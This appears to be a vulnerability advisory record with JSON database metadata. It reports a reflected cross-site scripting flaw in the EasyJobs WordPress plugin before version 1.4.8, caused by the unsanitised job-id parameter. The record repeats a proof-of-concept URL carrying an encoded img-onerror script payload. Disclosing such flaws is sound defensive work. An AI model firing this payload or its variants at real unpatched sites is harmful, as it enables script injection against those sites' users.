Description
The plugin does not sanitise and escape the job-id parameter before outputting it back in a page, leading to a Reflected Cross-Site Scripting
### PoC
https://example.com/wp-content/plugins/easyjobs/admin/partials/easyjobs-candidates-display.php?job-id=%22%3E%3Cimg/src/onerror=alert(/XSS/)%3E
Affected Software
{"id": "WPVDB-ID:CC2FADEC-2353-4C39-A395-84F2A0D08058", "vendorId": null, "type": "wpvulndb", "bulletinFamily": "software", "title": "EasyJobs < 1.4.8 - Reflected Cross-Site Scripting", "description": "The plugin does not sanitise and escape the job-id parameter before outputting it back in a page, leading to a Reflected Cross-Site Scripting\n\n### PoC\n\nhttps://example.com/wp-content/plugins/easyjobs/admin/partials/easyjobs-candidates-display.php?job-id=%22%3E%3Cimg/src/onerror=alert(/XSS/)%3E\n", "published": "2022-02-03T00:00:00", "modified": "2022-02-03T21:16:32", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://wpscan.com/vulnerability/cc2fadec-2353-4c39-a395-84f2a0d08058", "reporter": "Jan w Oleju", "references": ["https://plugins.trac.wordpress.org/changeset/2669143"], "cvelist": [], "immutableFields": [], "lastseen": "2022-02-14T01:47:55", "viewCount": 2, "enchantments": {"backreferences": {}, "dependencies": {}, "exploitation": null, "score": {"value": 0.2, "vector": "NONE"}, "affected_software": {"major_version": [{"name": "easyjobs", "version": 1}]}, "vulnersScore": 0.2}, "affectedSoftware": [{"version": "1.4.8", "operator": "lt", "name": "easyjobs"}], "exploit": "https://example.com/wp-content/plugins/easyjobs/admin/partials/easyjobs-candidates-display.php?job-id=%22%3E%3Cimg/src/onerror=alert(/XSS/)%3E", "sourceData": "", "generation": 0, "_state": {"dependencies": 1646245477, "score": 1684013406, "affected_software_major_version": 1666695388, "epss": 1679178262}, "_internal": {"score_hash": "0c9c74a21bbdda27363d188695fe35a1"}}
{}
EasyJobs < 1.4.8 - Reflected Cross-Site Scripting